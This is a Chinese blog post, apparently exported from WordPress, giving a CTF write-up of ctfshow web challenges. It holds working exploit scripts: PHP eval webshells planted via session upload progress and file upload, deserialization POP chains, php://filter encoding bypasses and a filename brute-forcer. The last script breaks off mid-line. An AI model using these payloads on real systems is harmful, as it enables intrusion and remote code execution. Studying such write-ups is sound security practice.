{"id":3092,"date":"2024-01-23T22:29:13","date_gmt":"2024-01-23T14:29:13","guid":{"rendered":"https:\/\/fushuling.com\/?p=3092"},"modified":"2025-05-18T21:20:47","modified_gmt":"2025-05-18T13:20:47","slug":"ctfshow%e5%85%83%e6%97%a6%e6%b0%b4%e5%8f%8b%e8%b5%9b%e5%be%85%e7%bb%ad","status":"publish","type":"post","link":"https:\/\/fushuling.com\/index.php\/2024\/01\/23\/ctfshow%e5%85%83%e6%97%a6%e6%b0%b4%e5%8f%8b%e8%b5%9b%e5%be%85%e7%bb%ad\/","title":{"rendered":"ctfshow\u5143\u65e6\u6c34\u53cb\u8d5bweb\u65b9\u5411"},"content":{"rendered":"\n

easy_include<\/h2>\n\n\n\n
 <?php\n\nfunction waf($path){\n    $path = str_replace(\".\",\"\",$path);\n    return preg_match(\"\/^[a-z]+\/\",$path);\n}\n\nif(waf($_POST[1])){\n    include \"file:\/\/\".$_POST[1];\n}\n<\/code><\/pre>\n\n\n\n
\u5305\u542bsession<\/p>\n\n\n\n
import requests\n\nurl = \"http:\/\/efcf9ddd-fc12-48dd-bb9f-b3a1ee1604aa.challenge.ctf.show\/\"\n\ndata = {\n    'PHP_SESSION_UPLOAD_PROGRESS': '<?php eval($_POST[2]);?>',\n    '1':'localhost\/tmp\/sess_fushuling',\n    '2':'system(\"cat \/f*\");'\n}\nfile = {\n    'file': 'fushuling'\n}\ncookies = {\n    'PHPSESSID': 'fushuling'\n}\n\nresponse = requests.post(url=url,data=data,files=file,cookies=cookies)\n\nprint(response.text)\n<\/code><\/pre>\n\n\n\n
easy_web<\/h2>\n\n\n\n
<?php\nheader('Content-Type:text\/html;charset=utf-8');\nerror_reporting(0);\n\n\nfunction waf1($Chu0){\n    foreach ($Chu0 as $name => $value) {\n        if(preg_match('\/[a-z]\/i', $value)){\n            exit(\"waf1\");\n        }\n    }\n}\n\nfunction waf2($Chu0){\n    if(preg_match('\/show\/i', $Chu0))\n        exit(\"waf2\");\n}\n\nfunction waf_in_waf_php($a){\n    $count = substr_count($a,'base64');\n    echo \"hinthinthint,base64\u5594\".\"<br>\";\n    if($count!=1){\n        return True;\n    }\n    if (preg_match('\/ucs-2|phar|data|input|zip|flag|\\%\/i',$a)){\n        return True;\n    }else{\n        return false;\n    }\n}\n\nclass ctf{\n    public $h1;\n    public $h2;\n\n    public function __wakeup(){\n        throw new Exception(\"fastfast\");\n    }\n\n    public function __destruct()\n    {\n        $this->h1->nonono($this->h2);\n    }\n}\n\nclass show{\n\n    public function __call($name,$args){\n        if(preg_match('\/ctf\/i',$args[0][0][2])){\n            echo \"gogogo\";\n        }\n    }\n}\n\nclass Chu0_write{\n    public $chu0;\n    public $chu1;\n    public $cmd;\n    public function __construct(){\n        $this->chu0 = 'xiuxiuxiu';\n    }\n\n    public function __toString(){\n        echo \"__toString\".\"<br>\";\n        if ($this->chu0===$this->chu1){\n            $content='ctfshowshowshowwww'.$_GET['chu0'];\n            if (!waf_in_waf_php($_GET['name'])){\n                file_put_contents($_GET['name'].\".txt\",$content);\n            }else{\n                echo \"\u7ed5\u4e00\u4e0b\u5427\u5b69\u5b50\";\n            }\n                $tmp = file_get_contents('ctfw.txt');\n                echo $tmp.\"<br>\";\n                if (!preg_match(\"\/f|l|a|g|x|\\*|\\?|\\[|\\]| |\\'|\\<|\\>|\\%\/i\",$_GET['cmd'])){\n                    eval($tmp($_GET['cmd']));\n                }else{\n                    echo \"waf!\";\n                }\n\n            file_put_contents(\"ctfw.txt\",\"\");\n        }\n        return \"Go on\";\n        }\n}\n\n\nif (!$_GET['show_show.show']){\n    echo \"\u5f00\u80c3\u5c0f\u83dc\uff0c\u5c31\u8ba9\u6211\u6210\u4e3a\u7b7e\u5230\u9898\u53ed\";\n    highlight_file(__FILE__);\n}else{\n    echo \"WAF,\u542f\u52a8\uff01\";\n    waf1($_REQUEST);\n    waf2($_SERVER['QUERY_STRING']);\n    if (!preg_match('\/^[Oa]:[\\d]\/i',$_GET['show_show.show'])){\n        unserialize($_GET['show_show.show']);\n    }else{\n        echo \"\u88abwaf\u5566\";\n    }\n\n}<\/code><\/pre>\n\n\n\n
\u62c6\u5f00\u770b\uff0c\u628awaf\u5565\u7684\u90fd\u5148\u4e0d\u770b\uff0c\u5173\u952e\u662f\u89e6\u53d1\u5230Chu0_write\u7684toString()<\/p>\n\n\n\n
<?php\nheader('Content-Type:text\/html;charset=utf-8');\nerror_reporting(0);\n\nclass ctf{\n    public $h1;\n    public $h2;\n\n    public function __destruct()\n    {\n        $this->h1->nonono($this->h2);\n    }\n}\n\nclass show{\n\n    public function __call($name,$args){\n        if(preg_match('\/ctf\/i',$args[0][0][2])){\n            echo \"gogogo\";\n        }\n    }\n}\n\nclass Chu0_write{\n    public function __toString(){\n        echo \"__toString\".\"<br>\";\n        }\n}\n\nunserialize($_GET['show_show.show']);<\/code><\/pre>\n\n\n\n
\u94fe\u5b50\u5012\u662f\u4e0d\u96be<\/p>\n\n\n\n
ctf::__destruct\n\u2193\u2193\u2193\nshow::__call()\n\u2193\u2193\u2193\nChu0_write<\/code>::tostring<\/code><\/pre>\n\n\n\n
\u7ed9ctf->$h1\u8d4b\u4e3ashow\uff0c\u8fd9\u6837\u89e6\u53d1call\uff0c\u7136\u540e$b=new Chu0_write(); $c=array(”,”,$b);$a->h2=array($c);\u5b9e\u73b0\u5bf9Chu0_write::tostring\u7684\u89e6\u53d1<\/p>\n\n\n\n
<?php\nclass ctf{\n    public $h1;\n    public $h2;\n\n    public function __destruct()\n    {\n        $this->h1->nonono($this->h2);\n    }\n}\n\nclass show{\n\n    public function __call($name,$args){\n        if(preg_match('\/ctf\/i',$args[0][0][2])){\n            echo \"gogogo\";\n        }\n    }\n}\n\nclass Chu0_write{\n    public function __toString(){\n        echo \"__toString\".\"<br>\";\n        }\n}\n$a=new ctf();\n$b=new Chu0_write();\n$c=array('','',$b);\n$a->h1=new show();\n$a->h2=array($c);\necho serialize($a);\n#O:3:\"ctf\":2:{s:2:\"h1\";O:4:\"show\":0:{}s:2:\"h2\";a:1:{i:0;a:3:{i:0;s:0:\"\";i:1;s:0:\"\";i:2;O:10:\"Chu0_write\":0:{}}}}\n?><\/code><\/pre>\n\n\n\n
\u4f20\u7684\u65f6\u5019\u7528show[show.show\uff0cphp\u5224\u65ad\u7684\u65f6\u5019\u4f1a\u628a\u7b2c\u4e00\u4e2a[\u8f6c\u4e3a_\u7136\u540e\u540e\u9762\u7684\u5c31\u4e0d\u4fee\u6539\u4e86\u3002<\/p>\n\n\n\n
\u7136\u540e\u6765\u770bwaf\uff1a<\/p>\n\n\n\n
function waf1($Chu0){\n    foreach ($Chu0 as $name => $value) {\n        if(preg_match('\/[a-z]\/i', $value)){\n            exit(\"waf1\");\n        }\n    }\n}\nwaf1($_REQUEST);<\/code><\/pre>\n\n\n\n
\u8fd9\u4e2a\u7b80\u5355\uff0c\u540e\u9762\u5224\u65ad\u662fwaf1($_REQUEST);\uff0c\u540c\u65f6\u4f20post\u548cget\u5176\u5b9e\u53ea\u4f1a\u5224\u65adget\uff0c\u6240\u4ee5post\u968f\u4fbf\u4f20\u4e00\u4e2a1\u8fc7\u5224\u65ad\u5c31\u884c\u4e86\u3002<\/p>\n\n\n\n
function waf2($Chu0){\n    if(preg_match('\/show\/i', $Chu0))\n        exit(\"waf2\");\n}\nwaf2($_SERVER['QUERY_STRING']);<\/code><\/pre>\n\n\n\n
\u5224\u65ad\u4f20\u53c2\u91cc\u7684show\uff0c\u7f16\u4e00\u4e0b\u7801\u5c31\u884c\u4e86show[show.show\u7f16\u7801\u6210%73%68%6f%77%5b%73%68%6f%77%2e%73%68%6f%77<\/p>\n\n\n\n
if (!preg_match('\/^[Oa]:[\\d]\/i',$_GET['show_show.show'])){\n        unserialize($_GET['show_show.show']);\n    }<\/code><\/pre>\n\n\n\n
\u8fd9\u4e2a\u6211\u535a\u5ba2\u8bb2\u8fc7\uff0c\u7528ArrayObject\u5bf9\u6b63\u5e38\u7684\u53cd\u5e8f\u5217\u5316\u8fdb\u884c\u4e00\u6b21\u5305\u88c5\uff0c\u8ba9\u6700\u540e\u8f93\u51fa\u7684payload\u4ee5C\u5f00\u5934\uff0c\u987a\u4fbf\u8fd8\u80fd\u7ed5\u4e00\u4e0bctf<\/code>\u8fd9\u4e2a\u7c7b\u91cc\u7684wakeup<\/p>\n\n\n\n
<?php\nclass ctf{\n    public $h1;\n    public $h2;\n\n    public function __destruct()\n    {\n        $this->h1->nonono($this->h2);\n    }\n}\n\nclass show{\n\n    public function __call($name,$args){\n        if(preg_match('\/ctf\/i',$args[0][0][2])){\n            echo \"gogogo\";\n        }\n    }\n}\n\nclass Chu0_write{\n    public function __toString(){\n        echo \"__toString\".\"<br>\";\n        }\n}\n$a=new ctf();\n$b=new Chu0_write();\n$c=array('','',$b);\n$a->h1=new show();\n$a->h2=array($c);\n$arr=array(\"evil\"=>$a);\n$oa=new ArrayObject($arr);\necho serialize($oa);\n?>\n#C:11:\"ArrayObject\":143:{x:i:0;a:1:{s:4:\"evil\";O:3:\"ctf\":2:{s:2:\"h1\";O:4:\"show\":0:{}s:2:\"h2\";a:1:{i:0;a:3:{i:0;s:0:\"\";i:1;s:0:\"\";i:2;O:10:\"Chu0_write\":0:{}}}}};m:a:0:{}}}<\/code><\/pre>\n\n\n\n
\u6d4b\u8bd5\u4ee3\u7801\uff1a<\/p>\n\n\n\n
<?php\nheader('Content-Type:text\/html;charset=utf-8');\nerror_reporting(0);\n\/\/ highlight_file(__FILE__);\n\nfunction waf1($Chu0){\n    foreach ($Chu0 as $name => $value) {\n        if(preg_match('\/[a-z]\/i', $value)){\n            exit(\"waf1\");\n        }\n    }\n}\n\nfunction waf2($Chu0){\n    if(preg_match('\/show\/i', $Chu0))\n        exit(\"waf2\");\n} \n\nclass ctf{\n    public $h1;\n    public $h2;\n\n    public function __destruct()\n    {\n        $this->h1->nonono($this->h2);\n    }\n}\n\nclass show{\n\n    public function __call($name,$args){\n        if(preg_match('\/ctf\/i',$args[0][0][2])){\n            echo \"gogogo\";\n        }\n    }\n}\n\nclass Chu0_write{\n    public function __toString(){\n        echo \"__toString\".\"<br>\";\n        }\n}\n\n    waf1($_REQUEST);\n    waf2($_SERVER['QUERY_STRING']);\n    if (!preg_match('\/^[Oa]:[\\d]\/i',$_GET['show_show.show'])){\n        unserialize($_GET['show_show.show']);\n    }else{\n        echo \"\u88abwaf\u5566\";\n    }<\/code><\/pre>\n\n\n\n
\u4f20\u7684\u65f6\u5019\u8bb0\u5f97\u7f16\u7801<\/p>\n\n\n\n
GET:\n%73%68%6f%77%5b%73%68%6f%77%2e%73%68%6f%77=%43%3a%31%31%3a%22%41%72%72%61%79%4f%62%6a%65%63%74%22%3a%31%34%33%3a%7b%78%3a%69%3a%30%3b%61%3a%31%3a%7b%73%3a%34%3a%22%65%76%69%6c%22%3b%4f%3a%33%3a%22%63%74%66%22%3a%32%3a%7b%73%3a%32%3a%22%68%31%22%3b%4f%3a%34%3a%22%73%68%6f%77%22%3a%30%3a%7b%7d%73%3a%32%3a%22%68%32%22%3b%61%3a%31%3a%7b%69%3a%30%3b%61%3a%33%3a%7b%69%3a%30%3b%73%3a%30%3a%22%22%3b%69%3a%31%3b%73%3a%30%3a%22%22%3b%69%3a%32%3b%4f%3a%31%30%3a%22%43%6\n8%75%30%5f%77%72%69%74%65%22%3a%30%3a%7b%7d%7d%7d%7d%7d%3b%6d%3a%61%3a%30%3a%7b%7d%7d\nPOST:\nshow%5Bshow.show=1<\/code><\/pre>\n\n\n\n
\"\"\/<\/div><\/figure>\n\n\n\n
\u770b\u6700\u540e\u7684\u4e00\u5757\uff0c\u90a3\u4e2atostring\u4e86\uff1a<\/p>\n\n\n\n
public function __construct(){\n        $this->chu0 = 'xiuxiuxiu';\n    }\nfunction waf_in_waf_php($a){\n    $count = substr_count($a,'base64');\n    echo \"hinthinthint,base64\u5594\".\"<br>\";\n    if($count!=1){\n        return True;\n    }\n    if (preg_match('\/ucs-2|phar|data|input|zip|flag|\\%\/i',$a)){\n        return True;\n    }else{\n        return false;\n    }\n}\npublic function __toString(){\n        echo \"__toString\".\"<br>\";\n        if ($this->chu0===$this->chu1){\n            $content='ctfshowshowshowwww'.$_GET['chu0'];\n            if (!waf_in_waf_php($_GET['name'])){\n                file_put_contents($_GET['name'].\".txt\",$content);\n            }else{\n                echo \"\u7ed5\u4e00\u4e0b\u5427\u5b69\u5b50\";\n            }\n                $tmp = file_get_contents('ctfw.txt');\n                echo $tmp.\"<br>\";\n                if (!preg_match(\"\/f|l|a|g|x|\\*|\\?|\\[|\\]| |\\'|\\<|\\>|\\%\/i\",$_GET['cmd'])){\n                    eval($tmp($_GET['cmd']));\n                }else{\n                    echo \"waf!\";\n                }\n\n            file_put_contents(\"ctfw.txt\",\"\");\n        }\n        return \"Go on\";\n        } <\/code><\/pre>\n\n\n\n
\u5bf9$_get[‘cmd’]\u8fc7\u6ee4\u4e86f\u3001l\u3001a\u3001g\u3001x\u3001*\u3001?\u3001[\u3001]\u3001\u7a7a\u683c\u3001\u5355\u5f15\u53f7\u3001\u5c16\u62ec\u53f7\u4ee5\u53ca\u767e\u5206\u53f7\uff0c\u6211\u4eec\u53ef\u4ee5\u7528chr(ascii\u7801)\u62fc\u63a5\u51fa\u6765\u4e86\uff0c\u6bd4\u5982\uff1a<\/p>\n\n\n\n
show_source(chr(47).chr(102).chr(108).chr(97).chr(103))<\/code><\/pre>\n\n\n\n
\u56e0\u4e3a\u8fc7\u6ee4show\u4e86\u6240\u4ee5\u540e\u9762\u628ashow\u7f16\u7801\u6210%73%68%6f%77<\/p>\n\n\n\n
def convert_to_ascii_special(text):\n  ascii_special = ''\n  for char in text:\n   ascii_code = ord(char)\n   ascii_special += 'chr({}).'.format(ascii_code)\n  ascii_special = ascii_special[:-1]\n  return ascii_special\ntext=\"\/flag\"\nprint(convert_to_ascii_special(text))\n#chr(47).chr(102).chr(108).chr(97).chr(103)<\/code><\/pre>\n\n\n\n
\u5f15\u7528\u7ed5\u8fc7if\u5f15\u7528\u8d4b\u503c\uff1a<\/p>\n\n\n\n
$chu1=&$chu0;<\/code><\/pre>\n\n\n\n
\u6700\u540e\u8fd9\u4e2a\u6709\u70b9\u590d\u6742\uff1a<\/p>\n\n\n\n
function waf_in_waf_php($a){\n    $count = substr_count($a,'base64');\n    echo \"hinthinthint,base64\u5594\".\"<br>\";\n    if($count!=1){\n        return True;\n    }\n    if (preg_match('\/ucs-2|phar|data|input|zip|flag|\\%\/i',$a)){\n        return True;\n    }else{\n        return false;\n    }\n}            \n            $content='ctfshowshowshowwww'.$_GET['chu0'];\n            if (!waf_in_waf_php($_GET['name'])){\n                file_put_contents($_GET['name'].\".txt\",$content);\n            }else{\n                echo \"\u7ed5\u4e00\u4e0b\u5427\u5b69\u5b50\";\n            }\n                $tmp = file_get_contents('ctfw.txt');\n                echo $tmp.\"<br>\";\n                if (!preg_match(\"\/f|l|a|g|x|\\*|\\?|\\[|\\]| |\\'|\\<|\\>|\\%\/i\",$_GET['cmd'])){\n                    eval($tmp($_GET['cmd']));\n                }else{\n                    echo \"waf!\";\n                }\n\n            file_put_contents(\"ctfw.txt\",\"\");<\/code><\/pre>\n\n\n\n
\u7b80\u5355\u6765\u8bf4$_GET[‘name’]\u8981\u51fa\u73b0\u4e00\u6b21base64\u8fd9\u4e2a\u5b57\u7b26\u4e32\uff0c\u4f46\u4e0d\u80fd\u51fa\u73b0’ucs-2’\u3001’phar’\u3001’data’\u3001’input’\u3001’zip’\u3001’flag’ \u548c ‘%’\u3002\u6700\u540e\u6211\u4eec\u8981\u628a$_GET[‘name’]\u6784\u9020\u6210ctfw\uff0c$tmp\u6784\u9020\u6210show_source\uff0c$tmp = file_get_contents(‘ctfw.txt’)\uff0c\u5176\u5b9e\u4e5f\u5c31\u662f\u5199\u8fdb\u53bb\u7684$content\uff0c\u8fd9\u91cc\u53ef\u4ee5\u770b\u5230$content\u88ab\u5e72\u6270\u4e86\uff0c$content=’ctfshowshowshowwww’.$_GET[‘chu0’]\uff0c\u6211\u4eec\u53ef\u63a7\u7684\u662f\u8fd9\u4e2a$_GET[‘chu0’]\u3002\u8fd9\u91cc\u5f97\u7528base64\u8fc7\u6ee4\u5783\u573e\u5b57\u7b26(\u770b\u9646\u961f\u7684\u6587\u7ae0\u6211\u4eec\u5176\u5b9e\u4e5f\u53ef\u4ee5\u770b\u5230\u53ef\u4ee5\u7528base64\u6784\u9020\u6307\u5b9a\u5b57\u7b26)<\/p>\n\n\n\n
<?php\n\n#fushuling1234\u4e09\u6b21base64\u7f16\u7801\u5f97\u5230V201V2VtRklWbk5oVnpWdVRWUkplazVCUFQwPQ==\n$d='lajizifuV201V2VtRklWbk5oVnpWdVRWUkplazVCUFQwPQ==';\necho $b=base64_decode($d);\necho \"<br>\".$b=base64_decode($b);\necho \"<br>\".base64_decode($b);#\u8f93\u51fafushuling1234\uff0c\u8fc7\u6ee4\u4e86lajizifu\u8fd9\u51e0\u4e2a\u5783\u573e\u5b57\u7b26<\/code><\/pre>\n\n\n\n
\u4f46\u8fd9\u91ccbase64\u9650\u5236\u4e86\u4e3a\u4e00\u6b21\uff0c\u6240\u4ee5\u5f97\u7528\u5176\u4ed6\u7f16\u7801\u8f85\u52a9\u6784\u9020<\/p>\n\n\n\n
<?php\n$b=\"lajizufu\";\n$payload=iconv('utf8','utf-16',base64_encode($b));\necho quoted_printable_encode($payload);#\u8f93\u51fa\u4e3a\u7a7a\uff0c\u6210\u529f\u8fc7\u6ee4\u5783\u573e\u5b57\u7b26\n?><\/code><\/pre>\n\n\n\n
?name=php:\/\/filter\/convert.quoted-printable-decode\/convert.iconv.utf-16.utf-8\/convert.base64-decode\/resource=ctfw<\/code><\/pre>\n\n\n\n
\u7136\u540e\u5bf9\u4e8e\u4f20\u8fdb\u53bb\u7684$content\uff0c\u6211\u4eec\u628a\u5b83\u6700\u540e\u6784\u9020\u6210assert\uff0c\u6700\u540e\u7ed3\u5408\u6210eval(assert(show_source(chr(47).chr(102).chr(108).chr(97).chr(103))))\u6253\u5370\u51fa\u6765flag<\/p>\n\n\n\n
<?php\n \n$b ='assert';\n \n$payload = iconv('utf-8', 'utf-16', base64_encode($b));\nfile_put_contents('payload.txt', quoted_printable_encode($payload));                                                                               \n$s = file_get_contents('payload.txt');\n$s = preg_replace('\/=\\r\\n\/', '', $s);\necho $s;#\u8f93\u51fa\u662f=FF=FEY=00X=00N=00z=00Z=00X=00J=000=00\u4f46\u53ea\u4fdd\u7559Y=00X=00N=00z=00Z=00X=00J=000=00<\/code><\/pre>\n\n\n\n
\u6700\u540e\u7684payload<\/p>\n\n\n\n
<?php\nclass ctf{\n    public $h1;\n    public $h2;\n\n    public function __destruct()\n    {\n        $this->h1->nonono($this->h2);\n    }\n}\n\nclass show{\n\n    public function __call($name,$args){\n        if(preg_match('\/ctf\/i',$args[0][0][2])){\n            echo \"gogogo\";\n        }\n    }\n}\n\n\nclass Chu0_write{\n    public $chu0;\n    public $chu1;\n    public $cmd;\n    public function __construct(){\n        $this->chu0 = 'xiuxiuxiu';\n    }\n\n    public function __toString(){\n\n}}\n$a=new ctf();\n$b=new Chu0_write();\n$b->chu1=&$b->chu0;\n$c=array('','',$b);\n$a->h1=new show();\n$a->h2=array($c);\n$arr=array(\"evil\"=>$a);\n$oa=new ArrayObject($arr);\necho serialize($oa);\n?>\n#C:11:\"ArrayObject\":198:{x:i:0;a:1:{s:4:\"evil\";O:3:\"ctf\":2:{s:2:\"h1\";O:4:\"show\":0:{}s:2:\"h2\";a:1:{i:0;a:3:{i:0;s:0:\"\";i:1;s:0:\"\";i:2;O:10:\"Chu0_write\":3:{s:4:\"chu0\";s:9:\"xiuxiuxiu\";s:4:\"chu1\";R:11;s:3:\"cmd\";N;}}}}};m:a:0:{}}<\/code><\/pre>\n\n\n\n
POST \/?%73%68%6f%77%5b%73%68%6f%77%2e%73%68%6f%77=%43%3a%31%31%3a%22%41%72%72%61%79%4f%62%6a%65%63%74%22%3a%31%39%38%3a%7b%78%3a%69%3a%30%3b%61%3a%31%3a%7b%73%3a%34%3a%22%65%76%69%6c%22%3b%4f%3a%33%3a%22%63%74%66%22%3a%32%3a%7b%73%3a%32%3a%22%68%31%22%3b%4f%3a%34%3a%22%73%68%6f%77%22%3a%30%3a%7b%7d%73%3a%32%3a%22%68%32%22%3b%61%3a%31%3a%7b%69%3a%30%3b%61%3a%33%3a%7b%69%3a%30%3b%73%3a%30%3a%22%22%3b%69%3a%31%3b%73%3a%30%3a%22%22%3b%69%3a%32%3b%4f%3a%31%30%3a%22%43%68%75%30%5f%77%72%69%74%65%22%3a%33%3a%7b%73%3a%34%3a%22%63%68%75%30%22%3b%73%3a%39%3a%22%78%69%75%78%69%75%78%69%75%22%3b%73%3a%34%3a%22%63%68%75%31%22%3b%52%3a%31%31%3b%73%3a%33%3a%22%63%6d%64%22%3b%4e%3b%7d%7d%7d%7d%7d%3b%6d%3a%61%3a%30%3a%7b%7d%7d&name=php:\/\/filter\/convert.quoted-printable-decode\/convert.iconv.utf-16.utf-8\/convert.base64-decode\/resource=ctfw&chu0=Y=00X=00N=00z=00Z=00X=00J=000=00&cmd=%73%68%6f%77_source(chr(47).chr(102).chr(108).chr(97).chr(103)); HTTP\/1.1\nHost: dee22314-2b63-4670-a81e-c7b72ddd62b0.challenge.ctf.show\nUser-Agent: Mozilla\/5.0 (Windows NT 10.0; Win64; x64; rv:109.0) Gecko\/20100101 Firefox\/116.0\nAccept: text\/html,application\/xhtml+xml,application\/xml;q=0.9,image\/avif,image\/webp,*\/*;q=0.8\nAccept-Language: zh-CN,zh;q=0.8,zh-TW;q=0.7,zh-HK;q=0.5,en-US;q=0.3,en;q=0.2\nAccept-Encoding: gzip, deflate\nContent-Type: application\/x-www-form-urlencoded\nContent-Length: 64\nOrigin: http:\/\/dee22314-2b63-4670-a81e-c7b72ddd62b0.challenge.ctf.show\nConnection: close\nReferer: http:\/\/dee22314-2b63-4670-a81e-c7b72ddd62b0.challenge.ctf.show\/\nUpgrade-Insecure-Requests: 1\n\n%73%68%6f%77%5b%73%68%6f%77%2e%73%68%6f%77=1&name=1&chu0=1&cmd=1<\/code><\/pre>\n\n\n\n
\u5b64\u6ce8\u4e00\u63b7<\/h2>\n\n\n\n
\u8bbf\u95eewww.zip\u62ff\u5230\u6e90\u7801\uff0c\u4e00\u773cthinkphp\uff0c\u5ba1MVC\u6846\u67b6\u76f4\u63a5\u770b\/index\/controller\u4e0b\u7684\u65b9\u6cd5\uff0c\u770b\u5230\u4e00\u4e2a\u4e0a\u4f20\u529f\u80fd<\/p>\n\n\n\n
\"\"\/<\/div><\/figure>\n\n\n\n
<?php\n\n\nnamespace app\\index\\controller;\n\n\nuse think\\Controller;\nuse think\\Request;\n\nclass Upload extends Controller\n{\n    public function image(Request $request)\n    {\n        $file = $request->file('file');\n        if( ! $file ) {\n            $this->error(\"error.\");\n        }\n        $info = $file->move(ROOT_PATH . 'public' . DS . 'uploads');\n\n        $filename = '\/uploads\/' . str_replace(\"\\\\\", \"\/\", $info->getSaveName());\n        $this->success('', null, $filename);\n    }\n}<\/code><\/pre>\n\n\n\n
\u672c\u5730\u642d\u4e86\u4e2a\u4e00\u6837\u7684\u73af\u5883\uff0c\u4f7f\u7528\u7684thinkphp\u7248\u672c\u662fThinkPHP5.0<\/code>\uff0c\u547d\u4ee4\u5176\u5b9e\u6bd4\u8f83\u7b80\u5355\uff0c\u5c31\u662f<\/p>\n\n\n\n
composer create-project topthink\/think=5.0.* tp5  --prefer-dist<\/code><\/pre>\n\n\n\n
\u7136\u540e\u8fd8\u8981\u5728extend\\fast\\<\/code>\u76ee\u5f55\u4e0b\u653e\u4e00\u4e2aForm.php\uff0c\u53bb\u8fd9\u91cc\u590d\u5236\u4e00\u4efdhttps:\/\/gitee.com\/karson\/fastadmin\/blob\/master\/extend\/fast\/Form.php<\/p>\n\n\n\n
\u4e0a\u4f20\u6587\u4ef6\u7684\u8def\u5f84\u662fROOT_PATH . 'public' . DS . 'uploads'<\/code>\uff0cfilename\u4fdd\u5b58\u4e3a$info->getSaveName()\uff0c\u8ddf\u8fd9\u4e2agetSaveName()<\/p>\n\n\n\n
\"\"\/<\/div><\/figure>\n\n\n\n
\"\"\/<\/div><\/figure>\n\n\n\n
protected function buildSaveName($savename)\n    {\n        \/\/ \u81ea\u52a8\u751f\u6210\u6587\u4ef6\u540d\n        if (true === $savename) {\n            if ($this->rule instanceof \\Closure) {\n                $savename = call_user_func_array($this->rule, [$this]);\n            } else {\n                switch ($this->rule) {\n                    case 'date':\n                        $savename = date('Ymd') . DS . md5(microtime(true));\n                        break;\n                    default:\n                        if (in_array($this->rule, hash_algos())) {\n                            $hash     = $this->hash($this->rule);\n                            $savename = substr($hash, 0, 2) . DS . substr($hash, 2);\n                        } elseif (is_callable($this->rule)) {\n                            $savename = call_user_func($this->rule);\n                        } else {\n                            $savename = date('Ymd') . DS . md5(microtime(true));\n                        }\n                }\n            }\n        } elseif ('' === $savename || false === $savename) {\n            $savename = $this->getInfo('name');\n        }\n\n        if (!strpos($savename, '.')) {\n            $savename .= '.' . pathinfo($this->getInfo('name'), PATHINFO_EXTENSION);\n        }\n\n        return $savename;\n    }<\/code><\/pre>\n\n\n\n
\u6587\u4ef6\u540d\u5c31\u662fdate(‘Ymd’) . DS . md5(microtime(true)) . ‘.’ . pathinfo($this->getInfo(‘name’), PATHINFO_EXTENSION);<\/p>\n\n\n\n
\u6700\u540e\u7684\u4fdd\u5b58\u8def\u5f84\u5927\u6982\u5c31\u662furl\/20240121\/md5(\u7cbe\u786e\u5230\u5c0f\u6570\u70b9\u540e\u56db\u4f4d\u7684\u5f53\u524d\u65f6\u95f4)\uff0c\u6587\u4ef6\u540e\u7f00\u662fpathinfo($this->getInfo(‘name’), PATHINFO_EXTENSION)\uff0c\u4e5f\u5c31\u662f\u539f\u4e0a\u4f20\u6587\u4ef6\u7684\u540e\u7f00\uff0c\u6bd4\u5982\u4e0a\u4f20\u4e2a1.php\u6700\u540e\u4fdd\u5b58\u7684\u6587\u4ef6\u5c31\u662fmd5(\u7cbe\u786e\u5230\u5c0f\u6570\u70b9\u540e\u56db\u4f4d\u7684\u5f53\u524d\u65f6\u95f4).php<\/p>\n\n\n\n
\u6240\u4ee5\u5173\u952e\u5c31\u662f\u4e0a\u4f20\u6587\u4ef6\uff0c\u7136\u540e\u83b7\u53d6\u4e0a\u4f20\u6587\u4ef6\u7684\u65f6\u95f4\uff0c\u5fae\u79d2\u6211\u4eec\u4e0d\u77e5\u9053\uff0c\u4f46\u4e5f\u5c31\u662f9999\u4f4d\uff0c\u76f4\u63a5\u7206\u7834\u5373\u53ef<\/p>\n\n\n\n
import requests\nfrom datetime import datetime\nimport subprocess\nimport pytz\nimport hashlib\n# Author:ctfshow-h1xa\n\nurl =\"http:\/\/33c133ae-9f99-4711-afbc-d5e7a3b7ef3e.challenge.ctf.show\/\"\nscriptDate = \"\"\nprefix = \"\"\n\nsession = requests.Session()\nheaders = {'User-Agent': 'Android'}\n\ndef init():\n    route=\"?url=\"+url\n    session.get(url=url+route,headers=headers)\n\ndef getPrefix():\n    route=\"index\/upload\/image\"\n    file = {\"file\":(\"1.php\",b\"<?php echo 'ctfshow';eval($_POST[1]);?>\")}\n    response = session.post(url=url+route,files=file,headers=headers)\n    response_date = response.headers['date']\n    print(\"\u6b63\u5728\u83b7\u53d6\u670d\u52a1\u5668\u65f6\u95f4\uff1a\")\n    print(response_date)\n    date_time_obj = datetime.strptime(response_date, \"%a, %d %b %Y %H:%M:%S %Z\")\n    date_time_obj = date_time_obj.replace(tzinfo=pytz.timezone('GMT'))\n    date_time_obj_gmt8 = date_time_obj.astimezone(pytz.timezone('Asia\/Shanghai'))\n    print(\"\u6b63\u5728\u8f6c\u6362\u670d\u52a1\u5668\u65f6\u95f4\uff1a\")\n    print(date_time_obj_gmt8)\n    year = date_time_obj_gmt8.year\n    month = date_time_obj_gmt8.month\n    day = date_time_obj_gmt8.day\n    hour = date_time_obj_gmt8.hour\n    minute = date_time_obj_gmt8.minute\n    second = date_time_obj_gmt8.second\n    global scriptDate,prefix\n    scriptDate = str(year)+str(month).zfill(2)+(str(\"0\"+str(day)) if day<10 else str(day))\n    print(scriptDate)\n    seconds = int(date_time_obj_gmt8.timestamp())\n    print(\"\u670d\u52a1\u5668\u65f6\u95f4\uff1a\")\n    print(seconds)\n    code = f'''php -r \"date_default_timezone_set('Asia\/Shanghai');echo mktime({hour},{minute},{second},{month},{day},{year});\"'''\n    print(\"\u811a\u672c\u65f6\u95f4\uff1a\")\n    result = subprocess.run(code,shell=True, capture_output=True, text=True)\n    script_time=int(result.stdout)\n    print(script_time)\n    if seconds == script_time:\n        print(\"\u65f6\u95f4\u78b0\u649e\u6210\u529f\uff0c\u5f00\u59cb\u7206\u7834\u6beb\u79d2\")\n        prefix =  seconds\n    else:\n        print(\"\u9519\u8bef\uff0c\u670d\u52a1\u5668\u65f6\u95f4\u548c\u811a\u672c\u65f6\u95f4\u4e0d\u4e00\u81f4\")\n        exit()\n        \ndef remove_trailing_zero(num):\n    if num % 1 == 0:\n        return int(num)\n    else:\n        str_num = str(num)\n        if str_num[-1] == '0':\n            return str_num[:-1]\n        else:\n            return num\n\ndef checkUrl():\n    h = open(\"url.txt\",\"a\")\n    global scriptDate\n    for i in range(0,10000):\n        target = str(prefix)+\".\"+str(i).zfill(4)\n        target=str(remove_trailing_zero(float(target)))\n        # target=remove_trailing_zero(target)\n        print(target)\n        md5 =string_to_md5(target)\n        # route = \"\/uploads\/\"+target+scriptDate+\"\/\"+md5+\".php\"\n        route = 